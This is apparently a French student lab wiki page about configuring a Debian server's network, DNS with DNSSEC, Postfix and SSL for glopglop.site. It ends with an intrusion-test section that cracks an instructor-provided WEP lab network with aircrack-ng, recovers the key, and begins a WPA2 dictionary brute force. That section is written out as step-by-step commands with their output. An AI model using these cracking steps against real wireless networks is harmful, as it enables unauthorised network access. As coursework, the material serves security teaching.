  iface lo inet loopback&lt;br /&gt;
 &lt;br /&gt;
  # Physical Network Interfaces&lt;br /&gt;
  #&lt;br /&gt;
 auto eth&lt;br /&gt;
  iface eth inet static&lt;br /&gt;
    address 192.168.0.29&lt;br /&gt;
    netmask 255.255.255.0&lt;br /&gt;
    gateway 192.168.0.1&lt;br /&gt;
 &lt;br /&gt;
 auto eth0&lt;br /&gt;
  iface eth0 inet manual&lt;br /&gt;
   post-up ip link set $IFACE up&lt;br /&gt;
   post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth1&lt;br /&gt;
  iface eth1 inet manual&lt;br /&gt;
   post-up ip link set $IFACE up&lt;br /&gt;
   post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth2&lt;br /&gt;
 iface eth2 inet manual&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth4&lt;br /&gt;
 iface eth4 inet manual&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth5&lt;br /&gt;
 iface eth5 inet manual&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth6&lt;br /&gt;
 iface eth6 inet manual&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth7&lt;br /&gt;
 iface eth7 inet manual&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 # Main trunk bridge&lt;br /&gt;
 #&lt;br /&gt;
 auto Trunk&lt;br /&gt;
 iface Trunk inet manual&lt;br /&gt;
  bridge_ports eth4 eth5&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 # Virtual Network Interfaces&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 auto vlan48&lt;br /&gt;
 iface vlan48 inet static&lt;br /&gt;
  vlan-raw-device Trunk&lt;br /&gt;
  address 172.26.191.21&lt;br /&gt;
  netmask 255.255.252.0&lt;br /&gt;
  gateway 172.26.191.254&lt;br /&gt;
 iface vlan48 inet6 auto&lt;br /&gt;
 &lt;br /&gt;
 auto vlan500&lt;br /&gt;
 iface vlan500 inet manual&lt;br /&gt;
  vlan-raw-device Trunk&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto vlan502&lt;br /&gt;
 iface vlan502 inet manual&lt;br /&gt;
  vlan-raw-device Trunk&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 # Bridge for IMA5sc group&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 auto IMA5sc&lt;br /&gt;
 iface IMA5sc inet manual&lt;br /&gt;
  bridge_ports eth0 eth6&lt;br /&gt;
 # Bridge for IMA2a5&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 auto IMA2a5&lt;br /&gt;
 iface IMA2a5 inet manual&lt;br /&gt;
  bridge_ports eth1 eth7&lt;br /&gt;
 # Bridge for L3MRIT group&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 auto L3MRIT&lt;br /&gt;
 iface L3MRIT inet manual&lt;br /&gt;
  bridge_ports eth2&lt;br /&gt;
 # Bridge for GIS group&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 auto bridgeGIS&lt;br /&gt;
 iface bridgeGIS inet manual&lt;br /&gt;
  bridge_ports vlan502&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Architecture réseau ==&lt;br /&gt;
&lt;br /&gt;
===Sécurisation du réseau===&lt;br /&gt;
&lt;br /&gt;
==Services Internet==&lt;br /&gt;
&lt;br /&gt;
===Serveur SSH===&lt;br /&gt;
&lt;br /&gt;
On peux maintenant se connecté a la VM mirage avec la commande : &amp;lt;code&amp;gt;ssh root@193.48.57.168 -p 2222&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Serveur DNS===&lt;br /&gt;
Un serveur DNS (Domain Name System) permet d'effectuer correspondance entre un nom de domaine et une adresse IP. Grâce à DNS, il n'est pas nécessaire de se souvenir des adresses IP pour naviguer sur Ethernet. Pour installer notre propre serveur DNS nous avons utilisé Bind9.&lt;br /&gt;
&lt;br /&gt;
Nous commençons tout d'abord par installer bind9 via la commande suivante : &amp;lt;code&amp;gt;apt-get install bind9&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Création et configuration named.conf.local ====&lt;br /&gt;
Le &amp;lt;code&amp;gt;named.conf.local&amp;lt;/code&amp;gt; permet de faire pointer un nom de domaine pleinement qualifié (FQDN fully qualified domain name) sur une adresse IP. &lt;br /&gt;
&lt;br /&gt;
Il faut tout d'abbord modifié le fichier &amp;lt;code&amp;gt;/etc/bind/named.conf.local&amp;lt;/code&amp;gt; qui contient la configuration DNS et y déclaré les zones associées au domaine ainsi qu'un fichier de description de la zone.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Mirage-config-named.conf.local.png|1000px|thumb|left|Configuration de mirage]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Puis créé le fichier de configuration appelé &amp;lt;code&amp;gt;glopglop.site&amp;lt;/code&amp;gt; avec la commande &amp;lt;code&amp;gt;vim /etc/bind/glopglop.site&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Configuration_bind9.png|1000px|thumb|left|Configuration de bind9]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On relance le service 'bind9' avec la commande :&amp;lt;code&amp;gt;service bind9 restart&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On vérifie que le DNS fonctionne bien avec le commande &amp;lt;code&amp;gt;host dns1.glopglop.site localhost&amp;lt;/code&amp;gt;&lt;br /&gt;
[[Fichier:Dns1.glopglop.site_2020-11-13_08-57-52.png|1000px|thumb|left|Vérification du DNS en local]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
Le DNS fonctionne donc bien.&lt;br /&gt;
&lt;br /&gt;
==== Configuration gandi.net ====&lt;br /&gt;
Grâce au registrar gandi.net, nous avons réservé le nom de domaine &amp;lt;code&amp;gt;glopglop.site&amp;lt;/code&amp;gt;. L'extension &amp;lt;code&amp;gt;.site&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Gandi-glopglop-VueGeneral.PNG|1000px|thumb|left|Image de la configuration de Gandi]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On va maintenant ajouter un &amp;quot;glue record&amp;quot; qui est un enregistrement collé. Il permet d'associer un nom d'hôte avec une adresse IP au registre.&lt;br /&gt;
Glue records fournis par gandi pour associer un hostname (nom de serveur ou DNS) à l'adresse IP de notre machine. Les modifications seront effectives entre 12 et 24 heures.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Mirage-Ajoue-GlueRecord.PNG|1000px|thumb|left|Image de la configuration de Gandi avec Glue Record]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois le &amp;quot;glue record&amp;quot; renseigner se qui va lié nottre dns a une ip, il faur renseigner les serveur de non. cela prend 27/72h.&lt;br /&gt;
Il faut bien faire attention que la VM soit correctement configurer avec 'bind9' car c'est lui qui donne IPv4 et IPv6 correspondant à vos noms de machines. Si ce n'est pas le cas gandi ne pourras pas liée les dns a l'ip de la machine.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:GandiDNS_2020-11-13_09-00-16.png|1000px|thumb|left|DNS sur GANDI]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois les serveuyrs de non configurer, on peux fermer GANDI.&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de site web par certificat===&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de serveur DNS par DNSSEC===&lt;br /&gt;
Premièrement, on ajoute &amp;lt;code&amp;gt;l'obtion dnssec-enable yes;&amp;lt;/code&amp;gt; dans le fichier &amp;lt;code&amp;gt;named.conf.options&amp;lt;/code&amp;gt;.&lt;br /&gt;
====Génération des clef asymétrique====&lt;br /&gt;
Il est important de bien sauvegarder la clef privée, sinon nottre système de clef ne fonctionnera pas.&lt;br /&gt;
pour commancer, on crée un repertoire pour stocker les clef.&lt;br /&gt;
  cd /etc/bind&lt;br /&gt;
  mkdir glopglop.site.dnssec&lt;br /&gt;
  cd glopglop.site.dnssec/&lt;br /&gt;
&lt;br /&gt;
Une fois dans le dossier &amp;lt;code&amp;gt;glopglop.site.dnssec&amp;lt;/code&amp;gt;, on crée les clefs avec la commande&amp;lt;code&amp;gt;dnssec-keygen -r /dev/urandom -a RSASHA1 -b 2048 -f KSK -n ZONE glopglop.site&amp;lt;/code&amp;gt;&lt;br /&gt;
On obtien : &lt;br /&gt;
 Generating key pair...............+++++ ..........................................+++++ &lt;br /&gt;
 Kglopglop.site.+005+15337&lt;br /&gt;
&lt;br /&gt;
On crée ensuite le clef asymétrique pour la signature des enregistrements, pour cela on utilise la commande &amp;lt;code&amp;gt;dnssec-keygen -r /dev/urandom -a RSASHA1 -b 1024 -n ZONE glopglop.site&amp;lt;/code&amp;gt;&lt;br /&gt;
On obtien : &lt;br /&gt;
 Generating key pair................+++++ ..................................................+++++ &lt;br /&gt;
 Kglopglop.site.+005+55608&lt;br /&gt;
&lt;br /&gt;
On a bien maintenant la paire de clef privée/publique. Le problème est qu'il est difficile de les distinguer avec leurs nom compliquer, il faut donc les rennomer pouyr plus de transparance.&lt;br /&gt;
On renomme donc les deux paires de clefs obtenues en utilisant le nom de la zone comme préfixe puis en suffixant d’abord par la destination de la clef (-ksk pour la KSK ou -zsk pour la ZSK) puis par le type de clef (.key pour la clef publique ou .private pour la clef privée);&lt;br /&gt;
&lt;br /&gt;
 mv Kglopglop.site.+005+15337.key glopglop.site-ksk.key&lt;br /&gt;
 mv Kglopglop.site.+005+15337.private glopglop.site-ksk.private&lt;br /&gt;
 mv Kglopglop.site.+005+55608.key glopglop.site-zsk.key&lt;br /&gt;
 mv Kglopglop.site.+005+55608.private glopglop.site-zsk.private&lt;br /&gt;
&lt;br /&gt;
[[Fichier:ClefPrivéePublique_2020-11-13_09-23-42.png|1000px|thumb|left|Clef Privée et Public]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Dans &amp;lt;code&amp;gt;db.glopglop.site&amp;lt;/code&amp;gt; on ajoute les deux lignes ci-dessous : &lt;br /&gt;
 $include /etc/bind/glopglop.site.dnssec/glopglop.site-ksk.key&lt;br /&gt;
 $include /etc/bind/glopglop.site.dnssec/glopglop.site-zsk.key&lt;br /&gt;
&lt;br /&gt;
On signe la zone d'enregistremment avec la commande &amp;lt;code&amp;gt;dnssec-signzone -o glopglop.site -k glopglop.site-ksk ../db.glopglop.site glopglop.site-zsk&amp;lt;/code&amp;gt;&lt;br /&gt;
[[Fichier:Zones_d'enregistrement_2020-11-13_10-27-11.png|1000px|thumb|left|Generation des zones d'enregistrement]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Les clef sont maintenant fonctionelle il faut donc les ajouter a GANDI, pour cela on se connecte a gandi puis on ajoute une clef KSK.&lt;br /&gt;
pour obtenir la cled on utilise la commande &amp;lt;code&amp;gt;cat glopglop.site-ksk.key&amp;lt;/code&amp;gt; on obtien le résultat ci-dessous : &lt;br /&gt;
 ; This is a key-signing key, keyid 15337, for glopglop.site.&lt;br /&gt;
 ; Created: 20201113090442 (Fri Nov 13 09:04:42 2020)&lt;br /&gt;
 ; Publish: 20201113090442 (Fri Nov 13 09:04:42 2020)&lt;br /&gt;
 ; Activate: 20201113090442 (Fri Nov 13 09:04:42 2020)&lt;br /&gt;
 glopglop.site. IN DNSKEY 257 3 5 AwEAAc3TCJkWFGnZSj/Q364AF7n69UaXum/no+LuEbXbGjTXLETdYk+Q gVAmIpvbJXcG0rucJTbVFaHr8IhWqf7VvkCbEGAORAkzBVXThPDR1pZR lJDEY88Lb2T6k9uHw43l2oP8vPev2eIRbU3VxUuJs++elgj32DTBA+yK p++/gz29H6PQVpkHnH81RjGdV+K1RZEwxkuev2MmB329fhMRwTsbW0BV aeXc5faRk9ZEKb7tr0p7txVv4wZEL6it01ZiNyGktwLRj8ln+cQz1GtC PY/UWnCtamycE/2k4f98sdDa6TMiguuBNOPug+ODzqGiI7LNUyF4jBbf 6NAgChwITps=&lt;br /&gt;
&lt;br /&gt;
On ajoute la clef a gandi comme montrer ci-dessous en n'oubliant pas de selectionner '5(RSA/SHA-1'.&lt;br /&gt;
[[Fichier:Zones_d'enregistrement_2020-11-13_10-27-11.png|1000px|thumb|left|gandi enregistrement de la clef KSK]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour vérifier que tout fonctionne correctement, on va sur le site 'dnsvizi.net' il nous permet d'analyser le dns et représanter la chaine d'autentification DNSSEC.&lt;br /&gt;
[[Fichier:DNSSEC_2020-11-13_11-59-06.png|1000px|thumb|left|Test du DNSSEC]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On peut voir que maintenant on a bien le statu 'SECURE' donc tout fonctionne bien.&lt;br /&gt;
&lt;br /&gt;
===Installation d'une méchagerie===&lt;br /&gt;
====Configuration de Postfix====&lt;br /&gt;
Pour recevoir le mail de vérfication de GANDI il faut sur la VM un gestionnaire de mail il faut installer mutt et postfix. On utilise les commandes ci-dessous : &lt;br /&gt;
 apt-get install postfix&lt;br /&gt;
 ant-get install mutt&lt;br /&gt;
&lt;br /&gt;
A l'installation de 'postfix' un fenètre de configuration s'ouver. &lt;br /&gt;
Il faut renseigner le non du site comme 'System mail name : 'glopglop.site'&lt;br /&gt;
&lt;br /&gt;
On vérifie la configuration de 'postix' en allant dans le 'main.cf'&lt;br /&gt;
 vi /etc/postfix/main.cf &lt;br /&gt;
&lt;br /&gt;
[[Fichier:Config Postfix mirage.png|1000px|thumb|left|Configuration de postfix]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On a bien le non de domaine 'glopglop.site' on peut relancer 'postfix'&lt;br /&gt;
 service postfix restart&lt;br /&gt;
Si le service n'est pas configurer correctement, on peut le reconfigurer avec la commande &amp;lt;code&amp;gt;dpkg-reconfigure postfix&amp;lt;/code&amp;gt;&lt;br /&gt;
====Réception d'un message====&lt;br /&gt;
On peux testé la reception de message en envoyant un message a 'roor@glopglop.site'&lt;br /&gt;
Si tout fonctionne bien, on peux visualisé les méssage recu en tappant la commande &amp;lt;code&amp;gt;mutt&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Reception_messages_mirage.png|1000px|thumb|left|texte descriptif]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On constate que on resoit bien les message en provenance du mail de Polytech.&lt;br /&gt;
Pour que gandi puissent nous envoyer le mail contenant la clef de cryptage, on a besoint de pouvoir recevoirr les messages qui sont destiné a 'admin@glopglop.site'&lt;br /&gt;
&lt;br /&gt;
Pour cela on va modifier le fichier 'vim /etc/aliases' en ajoutant la commande &amp;lt;code&amp;gt;admin:root&amp;lt;/code&amp;gt;&lt;br /&gt;
On crée ensuite un &amp;lt;code&amp;gt;newaliases&amp;lt;/code&amp;gt; puis on restarte bind9 avec la commance &amp;lt;code&amp;gt;service bind9 restart&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Attention pour les test il est conseiller d'utilisé deux boite mail différante care celle ci prenne du temps pour se mettre a jours.&lt;br /&gt;
&lt;br /&gt;
====Envoie du SSL Certification Gandi====&lt;br /&gt;
&lt;br /&gt;
Quand on est sure que le mail fonctionne bien avec l'envoie d'un message a destination de 'admin@glopglop.site' on peux demandé a gandi de bous envoyer la clef de cryptage.&lt;br /&gt;
On demande d'envoyet le ssl certification a notre VM, cela peux prendre un certain temps.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:SSL_Certification_Gandi_Mirage.png|1000px|thumb|left|texte descriptif]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Dans le mail de gandi on resoit un codde de confimartion ainsi q'un mot de passe. Une fois confirmer, on peut télécharger les fichiers 'glopglop.site.crt' et 'GandistandardSSLCA2.perm'&lt;br /&gt;
&lt;br /&gt;
Une fois les fichiers télécharger et importer dans la Vm dans le dossier '/root', il faut dire que quand on se connecte sur le site 'glopglop.site' en 'https' il dois utilisé la cled publique 'myserver.key'.&lt;br /&gt;
quand on utilise le ssh on passe par le port '442' dans le fichier &amp;lt;code&amp;gt;/etc/apache2/sites-available/default-ssl.conf&amp;lt;/code&amp;gt;&lt;br /&gt;
On ajoute les lignes suivantes : &lt;br /&gt;
&lt;br /&gt;
 SSLEngine on&lt;br /&gt;
 SSLCertificateFile /root/glopglop.site.crt&lt;br /&gt;
 SSLCertificateKeyFile /root/myserver.key&lt;br /&gt;
 SSLCertificateChainFile /root/GandiStandardSSLCA2.pem &lt;br /&gt;
&lt;br /&gt;
On reboot le service apash2 pour qu'il prenne les modification en compte.&lt;br /&gt;
&lt;br /&gt;
==Tests d’intrusion==&lt;br /&gt;
&lt;br /&gt;
=== Description ===&lt;br /&gt;
Un ordinateur portable et une clef Wifi est fourni par Monsieur Redon. Pour que le clef fonctionne il est nécessite pas nécessairement de la configuration. Il faut aussi installer les paquetages nécessaire pour craquer la clef Wep et la clef WPA &lt;br /&gt;
&lt;br /&gt;
=== Installation de la clef Wifi ===&lt;br /&gt;
Avec la commande &amp;lt;code&amp;gt;lsusb&amp;lt;/code&amp;gt; on peux voir la list des interfaces connecté aux pc. Ci-dessous les résultats obtenu.&lt;br /&gt;
&lt;br /&gt;
 Bus 003 Device 004: ID 148f:5370 Ralink Technology, Corp. RT5370 Wireless Adapter&lt;br /&gt;
 Bus 003 Device 002: ID 8087:0024 Intel Corp. Integrated Rate Matching Hub&lt;br /&gt;
 Bus 003 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub&lt;br /&gt;
 Bus 004 Device 001: ID 1d6b:0003 Linux Foundation 3.0 root hub&lt;br /&gt;
 Bus 002 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub&lt;br /&gt;
 Bus 001 Device 004: ID 413c:2003 Dell Computer Corp. Keyboard&lt;br /&gt;
 Bus 001 Device 003: ID 046d:c016 Logitech, Inc. Optical Wheel Mouse&lt;br /&gt;
 Bus 001 Device 002: ID 8087:0024 Intel Corp. Integrated Rate Matching Hub&lt;br /&gt;
 Bus 001 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub&lt;br /&gt;
&lt;br /&gt;
La clef ubs Wifi est bien détécter.&lt;br /&gt;
On doit donc installer le pilote pour les clef usb RT5370 avec la commande :&lt;br /&gt;
 apt-get install firmware-ralink&lt;br /&gt;
 apt-get install firmware-misc-nonfree&lt;br /&gt;
&lt;br /&gt;
Une fois les pilotes installer, on récupéère le nom de l'interface wifi avec la commande &amp;lt;code&amp;gt;ip l&amp;lt;/code&amp;gt; et on récupère le résultat ci-dessous : &lt;br /&gt;
 1: lo: &amp;lt;LOOPBACK,UP,LOWER_UP&amp;gt; mtu 65536 qdisc noqueue state UNKNOWN mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00&lt;br /&gt;
 2: eth0: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc pfifo_fast master bridge state UP mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 00:22:4d:7a:f1:c3 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
 3: eth1: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc pfifo_fast master bridge state UP mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 00:15:17:3b:14:a8 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
 5: bridge: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc noqueue state UP mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 00:15:17:3b:14:a8 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
 6: vmnet1: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc pfifo_fast state UNKNOWN mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 00:50:56:c0:00:01 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
 7: vmnet8: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc pfifo_fast state UNKNOWN mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 00:50:56:c0:00:08 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
 8: wlx40a5ef059784: &amp;lt;NO-CARRIER,BROADCAST,MULTICAST,UP&amp;gt; mtu 1500 qdisc mq state DOWN mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 40:a5:ef:05:97:84 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
&lt;br /&gt;
La clef wifi s'apelle donc &amp;lt;code&amp;gt;wlx40a5ef059784&amp;lt;/code&amp;gt; on fait maintenant un &amp;lt;code&amp;gt; ip link set wlx40a5ef059784 up&amp;gt;&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Avec la comande &amp;lt;code&amp;gt;dmsg&amp;lt;/code&amp;gt; on vérifie que la clef wifi fonctionne bien. &lt;br /&gt;
&lt;br /&gt;
=== Installation du paquetage AirCrack-ng ===&lt;br /&gt;
Pour installer [https://doc.ubuntu-fr.org/aircrack-ng AirCrack] (utilitaire qui permet de casser les clefs WEP et WPA), il faut de taper la commande :&lt;br /&gt;
 apt-get install aircrack-ng&lt;br /&gt;
 apt-get install firmware-misc-nonfree&lt;br /&gt;
&lt;br /&gt;
=== Utilisation de AirCrack pour clef WEP ===&lt;br /&gt;
 &lt;br /&gt;
Après avoir branché la clef WiFi, on se sert de &amp;lt;code&amp;gt;airmon-ng&amp;lt;/code&amp;gt; qui est un utilitaire qui espionne le réseau et permet d'obtenir les types d'interfaces communicantes/espionnable.&lt;br /&gt;
 airmon-ng&lt;br /&gt;
Pour tenter de s'y connecter en tant qu'espion, il faut alors taper (nous le tapons ici avec wlan0mon):&lt;br /&gt;
 airmon-ng start wlx40a5ef059784&lt;br /&gt;
Puis, pour observer et découvrir les canaux associés au réseau et leurs SSID,il faut taper:&lt;br /&gt;
 airodump-ng wlan0mon &lt;br /&gt;
&lt;br /&gt;
On obtien le résultat ci dessous :                                   &lt;br /&gt;
                                                                                                                &lt;br /&gt;
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                                 &lt;br /&gt;
 38:0E:4D:B0:E9:E0   -1        0        1    0   1  -1   WPA              &amp;lt;length:  0&amp;gt;                          &lt;br /&gt;
 04:DA:D2:9C:50:51  -30       49      834    0   9  54e. WEP  WEP         cracotte02                            &lt;br /&gt;
 04:DA:D2:9C:50:5A  -29       44      841    0   9  54e. WEP  WEP         cracotte11                            &lt;br /&gt;
 04:DA:D2:9C:50:56  -28       53      832    9   9  54e. WEP  WEP         cracotte07                            &lt;br /&gt;
 04:DA:D2:9C:50:57  -29       54      803    0   9  54e. WEP  WEP         cracotte08                            &lt;br /&gt;
 04:DA:D2:9C:50:59  -30       50      833    0   9  54e. WEP  WEP         cracotte10                            &lt;br /&gt;
 04:DA:D2:9C:50:54  -29       48      841    0   9  54e. WEP  WEP         cracotte05                            &lt;br /&gt;
 04:DA:D2:9C:50:50  -29       50      841    0   9  54e. WEP  WEP         cracotte01                            &lt;br /&gt;
 04:DA:D2:9C:50:5B  -29       50      825    0   9  54e. WEP  WEP         cracotte12                            &lt;br /&gt;
 04:DA:D2:9C:50:53  -33       46      843    0   9  54e. WEP  WEP         cracotte04                            &lt;br /&gt;
 04:DA:D2:9C:50:58  -28       50      694    0   9  54e. WEP  WEP         cracotte09                            &lt;br /&gt;
 04:DA:D2:9C:50:55  -30       49      746    0   9  54e. WEP  WEP         cracotte06                            &lt;br /&gt;
 04:DA:D2:9C:50:52  -33       50      764    0   9  54e. WEP  WEP         cracotte03                            &lt;br /&gt;
 00:14:1B:60:8C:28  -30       60        0    0   4  54e. WPA2 CCMP   PSK  kracotte09                            &lt;br /&gt;
 00:14:1B:60:8C:22  -31       55        0    0   4  54e. WPA2 CCMP   PSK  kracotte03                            &lt;br /&gt;
 00:14:1B:60:8C:27  -32       64        0    0   4  54e. WPA2 CCMP   PSK  kracotte08                            &lt;br /&gt;
 00:14:1B:60:8C:24  -34       58        0    0   4  54e. WPA2 CCMP   PSK  kracotte05                            &lt;br /&gt;
 00:14:1B:60:8C:23  -31       63        0    0   4  54e. WPA2 CCMP   PSK  kracotte04&lt;br /&gt;
&lt;br /&gt;
Le réseau que nous voulons craquer est &amp;lt;code&amp;gt;cracotte05 ssid : 04:DA:D2:9C:50:54  chanel : 9&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On utilise la commande &amp;lt;code&amp;gt;airodump-ng -w reseau_cracotte05 -c 9 --bssid 04:DA:D2:9C:50:54 wlan0mon&amp;lt;/code&amp;gt;. cela nous crée un &amp;lt;code&amp;gt;reseau_cracotte05-01.cap&amp;lt;/code&amp;gt; On n'as pluq qu'a faire un &amp;lt;code&amp;gt;aircrack-ng reseau_cracotte05-01.cap &amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
 KB    depth   byte(vote)&lt;br /&gt;
    0    0/  1   F1(50176) 48(46848) A1(46080) C9(45824) 2A(45056) &lt;br /&gt;
    1    0/  1   DE(50944) F0(46592) 60(45824) 4D(45312) 1E(44544) &lt;br /&gt;
    2    1/  3   D4(47360) 98(46336) B6(45568) A7(45056) EB(45056) &lt;br /&gt;
    3    0/  2   00(47360) 34(46848) 4E(45824) 6F(44800) 35(44544) &lt;br /&gt;
    4    0/  1   00(50688) 09(45824) 50(45568) FD(45056) 5E(44032) &lt;br /&gt;
    5    0/  3   00(46592) BD(45824) 4A(45824) 5A(45056) 87(45056) &lt;br /&gt;
    6    0/  1   00(51456) 09(47104) 3A(45824) F9(45824) 04(45568) &lt;br /&gt;
    7    0/  1   00(51712) C9(47360) 08(46336) 56(45312) E2(44800) &lt;br /&gt;
    8    0/  1   00(54016) 05(45568) C1(45312) D5(44544) B7(44288) &lt;br /&gt;
    9    0/  2   00(47872) 56(46592) 84(45568) 88(45568) F2(45056) &lt;br /&gt;
   10    1/  2   09(48128) 6B(45824) D5(45824) 0C(45568) C2(45568) &lt;br /&gt;
   11    0/  2   99(48128) 76(47616) 99(46080) E6(46080) 06(44800) &lt;br /&gt;
   12    2/  4   FD(44800) DE(44544) B9(44032) 3F(43776) 94(43776) &lt;br /&gt;
&lt;br /&gt;
   KEY FOUND! [ F1:DE:D4:00:00:00:00:00:00:00:09:99:99 ] &lt;br /&gt;
   Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
Et voila nous avons trouver clef du réseau wifi cracotte05&lt;br /&gt;
&lt;br /&gt;
=== Utilisation de AirCrack pour clef WPA2-PSA ===&lt;br /&gt;
&lt;br /&gt;
On va maintenant craquer le réseau Kracotte05 qui est un réseau WPA on sait d'avance que la clef WPA est un nombre sur 8 chiffres.&lt;br /&gt;
On va donc faire un &amp;quot;cassage par force brute&amp;quot; avec un fichier texte contenant tout les combination de 00000000 a 99999999.&lt;br /&gt;
&lt;br /&gt;
On commence par installer Crnch avec la commande &amp;lt;code&amp;gt;sudo apt-get install -y crunch&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois installer on génère un fichier dictionnaite.txt avec la commande &amp;lt;code&amp;gt;crunch 8 8 0123456789 &amp;gt;&amp;gt; dictionnaire_wpa.txt&amp;lt;/code&amp;gt;&lt;br /&gt;
On relance la commande &amp;lt;code&amp;gt;airodump-ng -w reseau_kracotte05 -c 5 --bssid 00:14:1B:60:8C:24&amp;lt;/code&amp;gt;&lt;br /&gt;
On a bien sure remplacer le ssid et le chanel par celui du wifi Kracotte05.&lt;br /&gt;
&lt;br /&gt;
Puis nous lançons aircrack-ng avec la commande &amp;lt;code&amp;gt;aircrack-ng reseau_kracotte05-01.cap -w dictionnaire_wpa.txt&amp;lt;/code&amp;gt;&lt;br /&gt;
